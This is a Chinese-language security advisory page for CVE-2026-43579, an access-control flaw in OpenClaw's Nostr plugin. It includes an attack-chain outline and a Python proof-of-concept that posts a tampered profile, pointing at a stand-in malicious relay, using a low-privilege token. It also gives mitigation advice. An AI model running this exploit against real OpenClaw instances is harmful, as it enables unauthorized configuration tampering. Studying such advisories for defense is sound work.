CVE-2026-43579 CVSS 6.5 中危

CVE-2026-43579 OpenClaw访问控制不足漏洞

披露日期: 2026-05-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43579

漏洞类型

访问控制不足

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.4.10之前的版本中存在访问控制不足漏洞。该漏洞位于Nostr插件的HTTP配置文件路由中，允许仅拥有写入权限的操作员在未获得管理员授权的情况下持久化配置文件配置。具有operator.write范围的攻击者可以通过未受保护的变更端点修改Nostr配置文件设置，从而实现未授权的配置持久化。该漏洞主要影响系统完整性。

技术细节

该漏洞源于OpenClaw软件Nostr插件中HTTP配置文件路由的访问控制机制存在缺陷。系统在处理敏感配置变更请求时，未能正确校验请求者是否具备管理员级别的权限，仅依赖基础的写入权限验证。这导致拥有`operator.write`低权限角色的用户能够访问本应受保护的API端点。攻击者无需用户交互，只需通过网络发送特制的恶意请求，即可篡改Nostr配置文件设置并将其持久化。由于CVSS向量显示C:N/I:H/A:N，此攻击主要破坏了系统配置的完整性，虽然未直接导致数据泄露或服务拒绝，但非法的配置修改可能导致业务逻辑错误或安全隐患。CVSS 3.1评分为6.5，属于中危风险。

攻击链分析

STEP 1

Reconnaissance

识别目标OpenClaw实例及其Nostr插件接口版本，确认其是否低于2026.4.10。

STEP 2

Authentication

获取一个具有`operator.write`权限的低级别账户凭证或API令牌。

STEP 3

Exploitation

利用未受保护的HTTP端点，使用获取的令牌发送包含恶意配置的POST请求。

STEP 4

Persistence

服务器接受请求并持久化修改后的Nostr配置文件设置，完成未授权的配置篡改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-43579 Proof of Concept
# This script demonstrates how an attacker with 'operator.write' scope
# can modify profile settings due to insufficient access control.

import requests

def exploit_openclaw(target_url, token):
    """
    Attempts to update the Nostr profile configuration without admin rights.
    """
    headers = {
        "Authorization": f"Bearer {token}",  # Token with operator.write scope
        "Content-Type": "application/json"
    }
    
    # Malicious payload to persist unauthorized configuration
    payload = {
        "nostr_profile": {
            "display_name": "Hacker Admin",
            "about": "This profile was modified via CVE-2026-43579",
            "relay_url": "wss://malicious-relay.example.com"
        }
    }
    
    # The vulnerable endpoint usually unprotected against operator.write
    endpoint = f"{target_url}/api/nostr/profile/update"
    
    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit successful! Profile configuration updated.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    # Replace with actual target and token
    TARGET = "http://vulnerable-openclaw-instance"
    TOKEN = "operator_write_token_here"
    exploit_openclaw(TARGET, TOKEN)

影响范围

OpenClaw < 2026.4.10

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用Nostr插件的相关HTTP接口，或者通过WAF（Web应用防火墙）拦截对特定配置变更端点的非管理员IP请求，直到应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表